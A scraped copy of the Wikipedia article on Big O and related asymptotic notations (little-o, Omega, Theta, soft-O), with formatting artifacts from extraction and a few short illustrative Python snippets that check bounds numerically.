Hardy introduced the symbols≼{\displaystyle \preccurlyeq }and≺{\displaystyle \prec }(as well as the already mentioned other symbols) in his 1910 tract "Orders of Infinity", and made use of them only in three papers (1910–1913). In his nearly 400 remaining papers and books he consistently used the Landau symbols O and o. Hardy's symbols≼{\displaystyle \preccurlyeq }and≺{\displaystyle \prec }(as well as≍−{\displaystyle \mathbin {\,\asymp \;\;\;\;\!\!\!\!\!\!\!\!\!\!\!\!\!-} }) are not used anymore. On the other hand, in the 1930s,[43]the Russian number theoristIvan Matveyevich Vinogradovintroduced his notation≪{\displaystyle \ll }, which has been increasingly used in number theory instead of theO{\displaystyle O}notation. We havef≪gif and only iff=O(g), and frequently both notations are used in the same paper. The big-O originally stands for "order of" ("Ordnung", Bachmann 1894), and is thus a Latin letter. Neither Bachmann nor Landau ever call it "Omicron". The symbol was much later on (1976) viewed by Knuth as a capitalomicron,[26]probably in reference to his definition of the symbolOmega. The digitzeroshould not be used.
https://en.wikipedia.org/wiki/Big_O_notation
BigOnotationis a mathematical notation that describes thelimiting behaviorof afunctionwhen theargumenttends towards a particular value or infinity. Big O is a member of afamily of notationsinvented by German mathematiciansPaul Bachmann,[1]Edmund Landau,[2]and others, collectively calledBachmann–Landau notationorasymptotic notation. The letter O was chosen by Bachmann to stand forOrdnung, meaning theorder of approximation. Incomputer science, big O notation is used toclassify algorithmsaccording to how their run time or space requirements[a]grow as the input size grows.[3]Inanalytic number theory, big O notation is often used to express a bound on the difference between anarithmetical functionand a better understood approximation; a famous example of such a difference is the remainder term in theprime number theorem. Big O notation is also used in many other fields to provide similar estimates. Big O notation characterizes functions according to their growth rates: different functions with the same asymptotic growth rate may be represented using the same O notation. The letter O is used because the growth rate of a function is also referred to as theorder of the function. A description of a function in terms of big O notation usually only provides anupper boundon the growth rate of the function. Associated with big O notation are several related notations, using the symbolso{\displaystyle o},Ω{\displaystyle \Omega },ω{\displaystyle \omega }, andΘ{\displaystyle \Theta }to describe other kinds of bounds on asymptotic growth rates.[3] Letf,{\displaystyle f,}the function to be estimated, be arealorcomplexvalued function, and letg,{\displaystyle g,}the comparison function, be a real valued function. Let both functions be defined on someunboundedsubsetof the positivereal numbers, andg(x){\displaystyle g(x)}be non-zero (often, but not necessarily, strictly positive) for all large enough values ofx.{\displaystyle x.}[4]One writesf(x)=O(g(x))asx→∞{\displaystyle f(x)=O{\bigl (}g(x){\bigr )}\quad {\text{ as }}x\to \infty }and it is read "f(x){\displaystyle f(x)}is big O ofg(x){\displaystyle g(x)}" or more often "f(x){\displaystyle f(x)}is of the order ofg(x){\displaystyle g(x)}" if theabsolute valueoff(x){\displaystyle f(x)}is at most a positive constant multiple of the absolute value ofg(x){\displaystyle g(x)}for all sufficiently large values ofx.{\displaystyle x.}That is,f(x)=O(g(x)){\displaystyle f(x)=O{\bigl (}g(x){\bigr )}}if there exists a positive real numberM{\displaystyle M}and a real numberx0{\displaystyle x_{0}}such that|f(x)|≤M|g(x)|for allx≥x0.{\displaystyle |f(x)|\leq M\ |g(x)|\quad {\text{ for all }}x\geq x_{0}~.}In many contexts, the assumption that we are interested in the growth rate as the variablex{\displaystyle \ x\ }goes to infinity or to zero is left unstated, and one writes more simply thatf(x)=O(g(x)).{\displaystyle f(x)=O{\bigl (}g(x){\bigr )}.}The notation can also be used to describe the behavior off{\displaystyle f}near some real numbera{\displaystyle a}(often,a=0{\displaystyle a=0}): we sayf(x)=O(g(x))asx→a{\displaystyle f(x)=O{\bigl (}g(x){\bigr )}\quad {\text{ as }}\ x\to a}if there exist positive numbersδ{\displaystyle \delta }andM{\displaystyle M}such that for all definedx{\displaystyle x}with0<|x−a|<δ,{\displaystyle 0<|x-a|<\delta ,}|f(x)|≤M|g(x)|.{\displaystyle |f(x)|\leq M|g(x)|.}Asg(x){\displaystyle g(x)}is non-zero for adequately large (or small) values ofx,{\displaystyle x,}both of these definitions can be unified using thelimit 
superior:f(x)=O(g(x))asx→a{\displaystyle f(x)=O{\bigl (}g(x){\bigr )}\quad {\text{ as }}\ x\to a}iflim supx→a|f(x)||g(x)|<∞.{\displaystyle \limsup _{x\to a}{\frac {\left|f(x)\right|}{\left|g(x)\right|}}<\infty .}And in both of these definitions thelimit pointa{\displaystyle a}(whether∞{\displaystyle \infty }or not) is acluster pointof the domains off{\displaystyle f}andg,{\displaystyle g,}i. e., in every neighbourhood ofa{\displaystyle a}there have to be infinitely many points in common. Moreover, as pointed out in the article about thelimit inferior and limit superior, thelim supx→a{\displaystyle \textstyle \limsup _{x\to a}}(at least on theextended real number line) always exists. In computer science, a slightly more restrictive definition is common:f{\displaystyle f}andg{\displaystyle g}are both required to be functions from some unbounded subset of thepositive integersto the nonnegative real numbers; thenf(x)=O(g(x)){\displaystyle f(x)=O{\bigl (}g(x){\bigr )}}if there exist positive integer numbersM{\displaystyle M}andn0{\displaystyle n_{0}}such that|f(n)|≤M|g(n)|{\displaystyle |f(n)|\leq M|g(n)|}for alln≥n0.{\displaystyle n\geq n_{0}.}[5] In typical usage theO{\displaystyle O}notation is asymptotical, that is, it refers to very largex{\displaystyle x}. In this setting, the contribution of the terms that grow "most quickly" will eventually make the other ones irrelevant. As a result, the following simplification rules can be applied: For example, letf(x)=6x4−2x3+5{\displaystyle f(x)=6x^{4}-2x^{3}+5}, and suppose we wish to simplify this function, usingO{\displaystyle O}notation, to describe its growth rate asx→∞{\displaystyle x\rightarrow \infty }. This function is the sum of three terms:6x4{\displaystyle 6x^{4}},−2x3{\displaystyle -2x^{3}}, and5{\displaystyle 5}. Of these three terms, the one with the highest growth rate is the one with the largest exponent as a function ofx{\displaystyle x}, namely6x4{\displaystyle 6x^{4}}. Now one may apply the second rule:6x4{\displaystyle 6x^{4}}is a product of6{\displaystyle 6}andx4{\displaystyle x^{4}}in which the first factor does not depend onx{\displaystyle x}. Omitting this factor results in the simplified formx4{\displaystyle x^{4}}. Thus, we say thatf(x){\displaystyle f(x)}is a "big O" ofx4{\displaystyle x^{4}}. Mathematically, we can writef(x)=O(x4){\displaystyle f(x)=O(x^{4})}. One may confirm this calculation using the formal definition: letf(x)=6x4−2x3+5{\displaystyle f(x)=6x^{4}-2x^{3}+5}andg(x)=x4{\displaystyle g(x)=x^{4}}. Applying theformal definitionfrom above, the statement thatf(x)=O(x4){\displaystyle f(x)=O(x^{4})}is equivalent to its expansion,|f(x)|≤Mx4{\displaystyle |f(x)|\leq Mx^{4}}for some suitable choice of a real numberx0{\displaystyle x_{0}}and a positive real numberM{\displaystyle M}and for allx>x0{\displaystyle x>x_{0}}. To prove this, letx0=1{\displaystyle x_{0}=1}andM=13{\displaystyle M=13}. Then, for allx>x0{\displaystyle x>x_{0}}:|6x4−2x3+5|≤6x4+|2x3|+5≤6x4+2x4+5x4=13x4{\displaystyle {\begin{aligned}|6x^{4}-2x^{3}+5|&\leq 6x^{4}+|2x^{3}|+5\\&\leq 6x^{4}+2x^{4}+5x^{4}\\&=13x^{4}\end{aligned}}}so|6x4−2x3+5|≤13x4.{\displaystyle |6x^{4}-2x^{3}+5|\leq 13x^{4}.} Big O notation has two main areas of application: In both applications, the functiong(x){\displaystyle g(x)}appearing within theO(⋅){\displaystyle O(\cdot )}is typically chosen to be as simple as possible, omitting constant factors and lower order terms. 
There are two formally close, but noticeably different, usages of this notation:[citation needed] This distinction is only in application and not in principle, however—the formal definition for the "big O" is the same for both cases, only with different limits for the function argument.[original research?] Big O notation is useful whenanalyzing algorithmsfor efficiency. For example, the time (or the number of steps) it takes to complete a problem of sizen{\displaystyle n}might be found to beT(n)=4n2−2n+2{\displaystyle T(n)=4n^{2}-2n+2}. Asn{\displaystyle n}grows large, then2{\displaystyle n^{2}}termwill come to dominate, so that all other terms can be neglected—for instance whenn=500{\displaystyle n=500}, the term4n2{\displaystyle 4n^{2}}is 1000 times as large as the2n{\displaystyle 2n}term. Ignoring the latter would have negligible effect on the expression's value for most purposes. Further, thecoefficientsbecome irrelevant if we compare to any otherorderof expression, such as an expression containing a termn3{\displaystyle n^{3}}orn4{\displaystyle n^{4}}. Even ifT(n)=1000000n2{\displaystyle T(n)=1000000n^{2}}, ifU(n)=n3{\displaystyle U(n)=n^{3}}, the latter will always exceed the former oncengrows larger than1000000{\displaystyle 1000000},viz.T(1000000)=10000003=U(1000000){\displaystyle T(1000000)=1000000^{3}=U(1000000)}. Additionally, the number of steps depends on the details of the machine model on which the algorithm runs, but different types of machines typically vary by only a constant factor in the number of steps needed to execute an algorithm. So the big O notation captures what remains: we write either or and say that the algorithm hasorder ofn2time complexity. The sign "=" is not meant to express "is equal to" in its normal mathematical sense, but rather a more colloquial "is", so the second expression is sometimes considered more accurate (see the "Equals sign" discussion below) while the first is considered by some as anabuse of notation.[6] Big O can also be used to describe theerror termin an approximation to a mathematical function. The most significant terms are written explicitly, and then the least-significant terms are summarized in a single big O term. Consider, for example, theexponential seriesand two expressions of it that are valid whenxis small:ex=1+x+x22!+x33!+x44!+⋯for all finitex=1+x+x22+O(x3)asx→0=1+x+O(x2)asx→0{\displaystyle {\begin{aligned}e^{x}&=1+x+{\frac {x^{2}}{2!}}+{\frac {x^{3}}{3!}}+{\frac {x^{4}}{4!}}+\dotsb &&{\text{for all finite }}x\\[4pt]&=1+x+{\frac {x^{2}}{2}}+O(x^{3})&&{\text{as }}x\to 0\\[4pt]&=1+x+O(x^{2})&&{\text{as }}x\to 0\end{aligned}}}The middle expression (the one withO(x3){\displaystyle O(x^{3})}) means the absolute-value of the errorex−(1+x+x22){\displaystyle e^{x}-(1+x+{\frac {x^{2}}{2}})}is at most some constant times|x3!|{\displaystyle |x^{3}!|}whenx{\displaystyle x}is close enough to0{\displaystyle 0}. If the functionfcan be written as a finite sum of other functions, then the fastest growing one determines the order off(n). For example, In particular, if a function may be bounded by a polynomial inn, then asntends toinfinity, one may disregardlower-orderterms of the polynomial. The setsO(nc)andO(cn)are very different. Ifcis greater than one, then the latter grows much faster. A function that grows faster thanncfor anycis calledsuperpolynomial. One that grows more slowly than any exponential function of the formcnis calledsubexponential. 
An algorithm can require time that is both superpolynomial and subexponential; examples of this include the fastest known algorithms forinteger factorizationand the functionnlogn. We may ignore any powers ofninside of the logarithms. The setO(logn)is exactly the same asO(log(nc)). The logarithms differ only by a constant factor (sincelog(nc) =clogn) and thus the big O notation ignores that. Similarly, logs with different constant bases are equivalent. On the other hand, exponentials with different bases are not of the same order. For example,2nand3nare not of the same order. Changing units may or may not affect the order of the resulting algorithm. Changing units is equivalent to multiplying the appropriate variable by a constant wherever it appears. For example, if an algorithm runs in the order ofn2, replacingnbycnmeans the algorithm runs in the order ofc2n2, and the big O notation ignores the constantc2. This can be written asc2n2= O(n2). If, however, an algorithm runs in the order of2n, replacingnwithcngives2cn= (2c)n. This is not equivalent to2nin general. Changing variables may also affect the order of the resulting algorithm. For example, if an algorithm's run time isO(n)when measured in terms of the numbernofdigitsof an input numberx, then its run time isO(logx)when measured as a function of the input numberxitself, becausen=O(logx). Iff1=O(g1){\displaystyle f_{1}=O(g_{1})}andf2=O(g2){\displaystyle f_{2}=O(g_{2})}thenf1+f2=O(max(|g1|,|g2|)){\displaystyle f_{1}+f_{2}=O(\max(|g_{1}|,|g_{2}|))}. It follows that iff1=O(g){\displaystyle f_{1}=O(g)}andf2=O(g){\displaystyle f_{2}=O(g)}thenf1+f2∈O(g){\displaystyle f_{1}+f_{2}\in O(g)}. Letkbe a nonzero constant. ThenO(|k|⋅g)=O(g){\displaystyle O(|k|\cdot g)=O(g)}. In other words, iff=O(g){\displaystyle f=O(g)}, thenk⋅f=O(g).{\displaystyle k\cdot f=O(g).} BigO(and little o, Ω, etc.) can also be used with multiple variables. To define bigOformally for multiple variables, supposef{\displaystyle f}andg{\displaystyle g}are two functions defined on some subset ofRn{\displaystyle \mathbb {R} ^{n}}. We say if and only if there exist constantsM{\displaystyle M}andC>0{\displaystyle C>0}such that|f(x)|≤C|g(x)|{\displaystyle |f(\mathbf {x} )|\leq C|g(\mathbf {x} )|}for allx{\displaystyle \mathbf {x} }withxi≥M{\displaystyle x_{i}\geq M}for somei.{\displaystyle i.}[7]Equivalently, the condition thatxi≥M{\displaystyle x_{i}\geq M}for somei{\displaystyle i}can be written‖x‖∞≥M{\displaystyle \|\mathbf {x} \|_{\infty }\geq M}, where‖x‖∞{\displaystyle \|\mathbf {x} \|_{\infty }}denotes theChebyshev norm. For example, the statement asserts that there exist constantsCandMsuch that whenever eitherm≥M{\displaystyle m\geq M}orn≥M{\displaystyle n\geq M}holds. This definition allows all of the coordinates ofx{\displaystyle \mathbf {x} }to increase to infinity. In particular, the statement (i.e.,∃C∃M∀n∀m⋯{\displaystyle \exists C\,\exists M\,\forall n\,\forall m\,\cdots }) is quite different from (i.e.,∀m∃C∃M∀n⋯{\displaystyle \forall m\,\exists C\,\exists M\,\forall n\,\cdots }). Under this definition, the subset on which a function is defined is significant when generalizing statements from the univariate setting to the multivariate setting. For example, iff(n,m)=1{\displaystyle f(n,m)=1}andg(n,m)=n{\displaystyle g(n,m)=n}, thenf(n,m)=O(g(n,m)){\displaystyle f(n,m)=O(g(n,m))}if we restrictf{\displaystyle f}andg{\displaystyle g}to[1,∞)2{\displaystyle [1,\infty )^{2}}, but not if they are defined on[0,∞)2{\displaystyle [0,\infty )^{2}}. 
This is not the only generalization of big O to multivariate functions, and in practice, there is some inconsistency in the choice of definition.[8] The statement "f(x)isO[g(x)]" as defined above is usually written asf(x) =O[g(x)]. Some consider this to be anabuse of notation, since the use of the equals sign could be misleading as it suggests a symmetry that this statement does not have. Asde Bruijnsays,O[x] =O[x2]is true butO[x2] =O[x]is not.[9]Knuthdescribes such statements as "one-way equalities", since if the sides could be reversed, "we could deduce ridiculous things liken=n2from the identitiesn=O[n2]andn2=O[n2]".[10]In another letter, Knuth also pointed out that[11] the equality sign is not symmetric with respect to such notations [as, in this notation,] mathematicians customarily use the '=' sign as they use the word 'is' in English: Aristotle is a man, but a man isn't necessarily Aristotle. For these reasons, it would be more precise to useset notationand writef(x) ∈O[g(x)]– read as: "f(x)is an element ofO[g(x)]", or "f(x)is in the setO[g(x)]" – thinking ofO[g(x)]as the class of all functionsh(x)such that|h(x)| ≤C|g(x)|for some positive real numberC.[10]However, the use of the equals sign is customary.[9][10] Big O notation can also be used in conjunction with other arithmetic operators in more complicated equations. For example,h(x) +O(f(x))denotes the collection of functions having the growth ofh(x)plus a part whose growth is limited to that off(x). Thus,g(x)=h(x)+O(f(x)){\displaystyle g(x)=h(x)+O(f(x))}expresses the same asg(x)−h(x)=O(f(x)).{\displaystyle g(x)-h(x)=O(f(x)).} Suppose analgorithmis being developed to operate on a set ofnelements. Its developers are interested in finding a functionT(n)that will express how long the algorithm will take to run (in some arbitrary measurement of time) in terms of the number of elements in the input set. The algorithm works by first calling a subroutine to sort the elements in the set and then perform its own operations. The sort has a known time complexity ofO(n2), and after the subroutine runs the algorithm must take an additional55n3+ 2n+ 10steps before it terminates. Thus the overall time complexity of the algorithm can be expressed asT(n) = 55n3+O(n2). Here the terms2n+ 10are subsumed within the faster-growingO(n2). Again, this usage disregards some of the formal meaning of the "=" symbol, but it does allow one to use the big O notation as a kind of convenient placeholder. In more complicated usage,O(·)can appear in different places in an equation, even several times on each side. For example, the following are true forn→∞{\displaystyle n\to \infty }:(n+1)2=n2+O(n),(n+O(n1/2))⋅(n+O(log⁡n))2=n3+O(n5/2),nO(1)=O(en).{\displaystyle {\begin{aligned}(n+1)^{2}&=n^{2}+O(n),\\(n+O(n^{1/2}))\cdot (n+O(\log n))^{2}&=n^{3}+O(n^{5/2}),\\n^{O(1)}&=O(e^{n}).\end{aligned}}}The meaning of such statements is as follows: foranyfunctions which satisfy eachO(·)on the left side, there aresomefunctions satisfying eachO(·)on the right side, such that substituting all these functions into the equation makes the two sides equal. For example, the third equation above means: "For any functionf(n) =O(1), there is some functiong(n) =O(en)such thatnf(n)=g(n)". In terms of the "set notation" above, the meaning is that the class of functions represented by the left side is a subset of the class of functions represented by the right side. In this use the "=" is a formal symbol that unlike the usual use of "=" is not asymmetric relation. 
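The "set membership" reading suggests a small experiment. The sketch below defines a hypothetical helper, appears_big_O, which scans sample points for a claimed pair of witnesses C and n₀; the helper name, constants, and sampling scheme are assumptions of this illustration, and a numerical scan is only evidence, not a proof:

```python
def appears_big_O(f, g, C, n0, n_max=10**6):
    """Check |f(n)| <= C*|g(n)| at sampled points n in [n0, n_max]."""
    n = n0
    while n <= n_max:
        if abs(f(n)) > C * abs(g(n)):
            return False
        n = max(n + 1, int(n * 1.3))      # geometrically spaced test points
    return True

# The example above: after the O(n^2) sort, the extra 2n + 10 steps are
# subsumed, since 2n + 10 <= 3*n^2 for all n >= 4.
print(appears_big_O(lambda n: 2*n + 10, lambda n: n*n, C=3, n0=4))    # True

# The "one-way" nature of '=': n = O(n^2) holds, but n^2 = O(n) does not.
print(appears_big_O(lambda n: n,   lambda n: n*n, C=1,   n0=1))       # True
print(appears_big_O(lambda n: n*n, lambda n: n,   C=100, n0=1))       # False
```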
Thus for examplenO(1)=O(en)does not imply the false statementO(en) =nO(1). Big O is typeset as an italicized uppercase "O", as in the following example:O(n2){\displaystyle O(n^{2})}.[12][13]InTeX, it is produced by simply typing 'O' inside math mode. Unlike Greek-named Bachmann–Landau notations, it needs no special symbol. However, some authors use the calligraphic variantO{\displaystyle {\mathcal {O}}}instead.[14][15] Here is a list of classes of functions that are commonly encountered when analyzing the running time of an algorithm. In each case,cis a positive constant andnincreases without bound. The slower-growing functions are generally listed first. The statementf(n)=O(n!){\displaystyle f(n)=O(n!)}is sometimes weakened tof(n)=O(nn){\displaystyle f(n)=O\left(n^{n}\right)}to derive simpler formulas for asymptotic complexity. For anyk>0{\displaystyle k>0}andc>0{\displaystyle c>0},O(nc(log⁡n)k){\displaystyle O(n^{c}(\log n)^{k})}is a subset ofO(nc+ε){\displaystyle O(n^{c+\varepsilon })}for anyε>0{\displaystyle \varepsilon >0},so may be considered as a polynomial with some bigger order. BigOis widely used in computer science. Together with some other related notations, it forms the family of Bachmann–Landau notations.[citation needed] Intuitively, the assertion "f(x)iso(g(x))" (read "f(x)is little-o ofg(x)" or "f(x)is of inferior order tog(x)") means thatg(x)grows much faster thanf(x), or equivalentlyf(x)grows much slower thang(x). As before, letfbe a real or complex valued function andga real valued function, both defined on some unbounded subset of the positivereal numbers, such thatg(x){\displaystyle g(x)}is strictly positive for all large enough values ofx. One writes if for every positive constantεthere exists a constantx0{\displaystyle x_{0}}such that For example, one has The difference between thedefinition of the big-O notationand the definition of little-o is that while the former has to be true forat least oneconstantM, the latter must hold foreverypositive constantε, however small.[18]In this way, little-o notation makes astronger statementthan the corresponding big-O notation: every function that is little-o ofgis also big-O ofg, but not every function that is big-O ofgis little-o ofg. For example,2x2=O(x2){\displaystyle 2x^{2}=O(x^{2})}but2x2≠o(x2){\displaystyle 2x^{2}\neq o(x^{2})}. Ifg(x){\displaystyle g(x)}is nonzero, or at least becomes nonzero beyond a certain point, the relationf(x)=o(g(x)){\displaystyle f(x)=o(g(x))}is equivalent to Little-o respects a number of arithmetic operations. For example, It also satisfies atransitivityrelation: Little-o can also be generalized to the finite case:[19] f(x)=o(g(x))asx→x0{\displaystyle f(x)=o(g(x))\quad {\text{ as }}x\to x_{0}}iff(x)=α(x)g(x){\displaystyle f(x)=\alpha (x)g(x)}for someα(x){\displaystyle \alpha (x)}withlimx→x0α(x)=0{\displaystyle \lim _{x\to x_{0}}\alpha (x)=0}. Or, ifg(x){\displaystyle g(x)}is nonzero in a neighbourhood aroundx0{\displaystyle x_{0}}: f(x)=o(g(x))asx→x0{\displaystyle f(x)=o(g(x))\quad {\text{ as }}x\to x_{0}}iflimx→x0f(x)g(x)=0{\displaystyle \lim _{x\to x_{0}}{\frac {f(x)}{g(x)}}=0}. This definition especially useful in the computation oflimitsusingTaylor series. 
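The ratio characterization of little-o lends itself to a quick numerical check (illustrative only; the sample points are arbitrary):

```python
import math

def ratios(f, g, xs):
    """f(x)/g(x) at the sample points xs; tending to 0 suggests f = o(g)."""
    return [f(x) / g(x) for x in xs]

xs = [10.0**k for k in range(1, 7)]

# 2x^2 = O(x^2) but 2x^2 is not o(x^2): the ratio stays at 2, never approaching 0.
print(ratios(lambda x: 2*x*x, lambda x: x*x, xs))          # [2.0, 2.0, 2.0, ...]

# x*log(x) = o(x^2): the ratio log(x)/x tends to 0.
print(ratios(lambda x: x*math.log(x), lambda x: x*x, xs))  # [0.230, 0.046, 0.0069, ...] -> 0
```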
For example: sin⁡x=x−x33!+…=x+o(x2)asx→0{\displaystyle \sin x=x-{\frac {x^{3}}{3!}}+\ldots =x+o(x^{2}){\text{ as }}x\to 0}, solimx→0sin⁡xx=limx→0x+o(x2)x=limx→01+o(x)=1{\displaystyle \lim _{x\to 0}{\frac {\sin x}{x}}=\lim _{x\to 0}{\frac {x+o(x^{2})}{x}}=\lim _{x\to 0}1+o(x)=1} Another asymptotic notation isΩ{\displaystyle \Omega }, read "big omega".[20]There are two widespread and incompatible definitions of the statement whereais some real number,∞{\displaystyle \infty }, or−∞{\displaystyle -\infty }, wherefandgare real functions defined in a neighbourhood ofa, and wheregis positive in this neighbourhood. The Hardy–Littlewood definition is used mainly inanalytic number theory, and the Knuth definition mainly incomputational complexity theory; the definitions are not equivalent. In 1914G.H. HardyandJ.E. Littlewoodintroduced the new symbolΩ,{\displaystyle \ \Omega \ ,}[21]which is defined as follows: Thusf(x)=Ω(g(x)){\displaystyle ~f(x)=\Omega {\bigl (}\ g(x)\ {\bigr )}~}is the negation off(x)=o(g(x)).{\displaystyle ~f(x)=o{\bigl (}\ g(x)\ {\bigr )}~.} In 1916 the same authors introduced the two new symbolsΩR{\displaystyle \ \Omega _{R}\ }andΩL,{\displaystyle \ \Omega _{L}\ ,}defined as:[22] These symbols were used byE. Landau, with the same meanings, in 1924.[23]Authors that followed Landau, however, use a different notation for the same definitions:[citation needed]The symbolΩR{\displaystyle \ \Omega _{R}\ }has been replaced by the current notationΩ+{\displaystyle \ \Omega _{+}\ }with the same definition, andΩL{\displaystyle \ \Omega _{L}\ }becameΩ−.{\displaystyle \ \Omega _{-}~.} These three symbolsΩ,Ω+,Ω−,{\displaystyle \ \Omega \ ,\Omega _{+}\ ,\Omega _{-}\ ,}as well asf(x)=Ω±(g(x)){\displaystyle \ f(x)=\Omega _{\pm }{\bigl (}\ g(x)\ {\bigr )}\ }(meaning thatf(x)=Ω+(g(x)){\displaystyle \ f(x)=\Omega _{+}{\bigl (}\ g(x)\ {\bigr )}\ }andf(x)=Ω−(g(x)){\displaystyle \ f(x)=\Omega _{-}{\bigl (}\ g(x)\ {\bigr )}\ }are both satisfied), are now currently used inanalytic number theory.[24][25] We have and more precisely We have and more precisely however In 1976Donald Knuthpublished a paper to justify his use of theΩ{\displaystyle \Omega }-symbol to describe a stronger property.[26]Knuth wrote: "For all the applications I have seen so far in computer science, a stronger requirement ... is much more appropriate". He defined with the comment: "Although I have changed Hardy and Littlewood's definition ofΩ{\displaystyle \Omega }, I feel justified in doing so because their definition is by no means in wide use, and because there are other ways to say what they want to say in the comparatively rare cases when their definition applies."[26] The limit definitions assumeg(n)>0{\displaystyle g(n)>0}for sufficiently largen{\displaystyle n}. The table is (partly) sorted from smallest to largest, in the sense thato,O,Θ,∼,{\displaystyle o,O,\Theta ,\sim ,}(Knuth's version of)Ω,ω{\displaystyle \Omega ,\omega }on functions correspond to<,≤,≈,=,{\displaystyle <,\leq ,\approx ,=,}≥,>{\displaystyle \geq ,>}on the real line[29](the Hardy–Littlewood version ofΩ{\displaystyle \Omega }, however, doesn't correspond to any such description). 
Computer science uses the bigO{\displaystyle O}, big ThetaΘ{\displaystyle \Theta }, littleo{\displaystyle o}, little omegaω{\displaystyle \omega }and Knuth's big OmegaΩ{\displaystyle \Omega }notations.[30]Analytic number theory often uses the bigO{\displaystyle O}, smallo{\displaystyle o}, Hardy's≍{\displaystyle \asymp },[31]Hardy–Littlewood's big OmegaΩ{\displaystyle \Omega }(with or without the +, − or ± subscripts) and∼{\displaystyle \sim }notations.[24]The small omegaω{\displaystyle \omega }notation is not used as often in analysis.[32] Informally, especially in computer science, the bigOnotation often can be used somewhat differently to describe an asymptotictightbound where using big Theta Θ notation might be more factually appropriate in a given context.[33]For example, when considering a functionT(n) = 73n3+ 22n2+ 58, all of the following are generally acceptable, but tighter bounds (such as numbers 2 and 3 below) are usually strongly preferred over looser bounds (such as number 1 below). The equivalent English statements are respectively: So while all three statements are true, progressively more information is contained in each. In some fields, however, the big O notation (number 2 in the lists above) would be used more commonly than the big Theta notation (items numbered 3 in the lists above). For example, ifT(n) represents the running time of a newly developed algorithm for input sizen, the inventors and users of the algorithm might be more inclined to put an upper asymptotic bound on how long it will take to run without making an explicit statement about the lower asymptotic bound. In their bookIntroduction to Algorithms,Cormen,Leiserson,RivestandSteinconsider the set of functionsfwhich satisfy In a correct notation this set can, for instance, be calledO(g), where O(g)={f:there exist positive constantscandn0such that0≤f(n)≤cg(n)for alln≥n0}.{\displaystyle O(g)=\{f:{\text{there exist positive constants}}~c~{\text{and}}~n_{0}~{\text{such that}}~0\leq f(n)\leq cg(n){\text{ for all }}n\geq n_{0}\}.}[34] The authors state that the use of equality operator (=) to denote set membership rather than the set membership operator (∈) is an abuse of notation, but that doing so has advantages.[6]Inside an equation or inequality, the use of asymptotic notation stands for an anonymous function in the setO(g), which eliminates lower-order terms, and helps to reduce inessential clutter in equations, for example:[35] Another notation sometimes used in computer science isÕ(readsoft-O), which hides polylogarithmic factors. There are two definitions in use: some authors usef(n) =Õ(g(n)) asshorthandforf(n) =O(g(n)logkn)for somek, while others use it as shorthand forf(n) =O(g(n) logkg(n)).[36]Wheng(n)is polynomial inn, there is no difference; however, the latter definition allows one to say, e.g. thatn2n=O~(2n){\displaystyle n2^{n}={\tilde {O}}(2^{n})}while the former definition allows forlogk⁡n=O~(1){\displaystyle \log ^{k}n={\tilde {O}}(1)}for any constantk. Some authors writeO*for the same purpose as the latter definition.[37]Essentially, it is bigOnotation, ignoringlogarithmic factorsbecause thegrowth-rateeffects of some other super-logarithmic function indicate a growth-rate explosion for large-sized input parameters that is more important to predicting bad run-time performance than the finer-point effects contributed by the logarithmic-growth factor(s). 
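For the example T(n) = 73n³ + 22n² + 58 above, the difference between a tight Θ bound and a loose O bound can be seen numerically (a small sketch, not from the source):

```python
def T(n):
    return 73 * n**3 + 22 * n**2 + 58

for n in (10, 10**3, 10**6):
    print(n, T(n) / n**3, T(n) / n**4)
# T(n)/n^3 -> 73: bounded above and bounded below away from 0, the signature
#               of a tight Theta(n^3) bound.
# T(n)/n^4 -> 0:  O(n^4) is a true statement but a loose upper bound only.
```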
This notation is often used to obviate the "nitpicking" within growth-rates that are stated as too tightly bounded for the matters at hand (since logknis alwayso(nε) for any constantkand anyε> 0). Also, theLnotation, defined as is convenient for functions that are betweenpolynomialandexponentialin terms ofln⁡n{\displaystyle \ln n}. The generalization to functions taking values in anynormed vector spaceis straightforward (replacing absolute values by norms), wherefandgneed not take their values in the same space. A generalization to functionsgtaking values in anytopological groupis also possible[citation needed]. The "limiting process"x→xocan also be generalized by introducing an arbitraryfilter base, i.e. to directednetsfandg. Theonotation can be used to definederivativesanddifferentiabilityin quite general spaces, and also (asymptotical) equivalence of functions, which is anequivalence relationand a more restrictive notion than the relationship "fis Θ(g)" from above. (It reduces to limf/g= 1 iffandgare positive real valued functions.) For example, 2xis Θ(x), but2x−xis noto(x). The symbol O was first introduced by number theoristPaul Bachmannin 1894, in the second volume of his bookAnalytische Zahlentheorie("analytic number theory").[1]The number theoristEdmund Landauadopted it, and was thus inspired to introduce in 1909 the notation o;[2]hence both are now called Landau symbols. These notations were used in applied mathematics during the 1950s for asymptotic analysis.[38]The symbolΩ{\displaystyle \Omega }(in the sense "is not anoof") was introduced in 1914 by Hardy and Littlewood.[21]Hardy and Littlewood also introduced in 1916 the symbolsΩR{\displaystyle \Omega _{R}}("right") andΩL{\displaystyle \Omega _{L}}("left"),[22]precursors of the modern symbolsΩ+{\displaystyle \Omega _{+}}("is not smaller than a small o of") andΩ−{\displaystyle \Omega _{-}}("is not larger than a small o of"). Thus the Omega symbols (with their original meanings) are sometimes also referred to as "Landau symbols". This notationΩ{\displaystyle \Omega }became commonly used in number theory at least since the 1950s.[39] The symbol∼{\displaystyle \sim }, although it had been used before with different meanings,[29]was given its modern definition by Landau in 1909[40]and by Hardy in 1910.[41]Just above on the same page of his tract Hardy defined the symbol≍{\displaystyle \asymp }, wheref(x)≍g(x){\displaystyle f(x)\asymp g(x)}means that bothf(x)=O(g(x)){\displaystyle f(x)=O(g(x))}andg(x)=O(f(x)){\displaystyle g(x)=O(f(x))}are satisfied. The notation is still currently used in analytic number theory.[42][31]In his tract Hardy also proposed the symbol≍−{\displaystyle \mathbin {\,\asymp \;\;\;\;\!\!\!\!\!\!\!\!\!\!\!\!\!-} }, wheref≍−g{\displaystyle f\mathbin {\,\asymp \;\;\;\;\!\!\!\!\!\!\!\!\!\!\!\!\!-} g}means thatf∼Kg{\displaystyle f\sim Kg}for some constantK≠0{\displaystyle K\not =0}. In the 1970s the big O was popularized in computer science byDonald Knuth, who proposed the different notationf(x)=Θ(g(x)){\displaystyle f(x)=\Theta (g(x))}for Hardy'sf(x)≍g(x){\displaystyle f(x)\asymp g(x)}, and proposed a different definition for the Hardy and Littlewood Omega notation.[26] Two other symbols coined by Hardy were (in terms of the modernOnotation) (Hardy however never defined or used the notation≺≺{\displaystyle \prec \!\!\prec }, nor≪{\displaystyle \ll }, as it has been sometimes reported). 
